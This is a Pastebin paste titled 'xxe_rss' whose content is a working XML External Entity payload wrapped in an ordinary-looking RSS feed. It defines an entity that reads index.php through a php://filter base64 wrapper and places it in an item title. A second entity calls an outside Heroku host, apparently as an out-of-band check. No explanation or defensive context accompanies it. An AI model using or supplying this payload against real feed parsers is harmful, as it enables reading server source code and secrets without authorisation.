Advertisement
nissim_abehcera

xxe_rss

Jan 29th, 2020
100
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.62 KB | None | 0 0
  1. <?xml version="1.0" encoding="ISO-8859-1"?>
  2. <!DOCTYPE foo [
  3. <!ELEMENT foo ANY >
  4. <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php" >
  5. <!ENTITY callhome SYSTEM "http://choccobin.herokuapp.com/1oex60x1/index.php?hello=1&there=2">
  6. ]>
  7. <rss version="2.0">
  8. <channel>
  9. <title>W3Schools Home Page</title>
  10. <link>https://www.w3schools.com</link>
  11. <description>Free web building tutorials</description>
  12. <item>
  13. <title>&xxe;</title>
  14. <link>https://www.w3schools.com/xml/xml_rss.asp</link>
  15. <description>New RSS tutorial on W3Schools</description>
  16. </item>
  17. </channel>
  18.  
  19. </rss>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement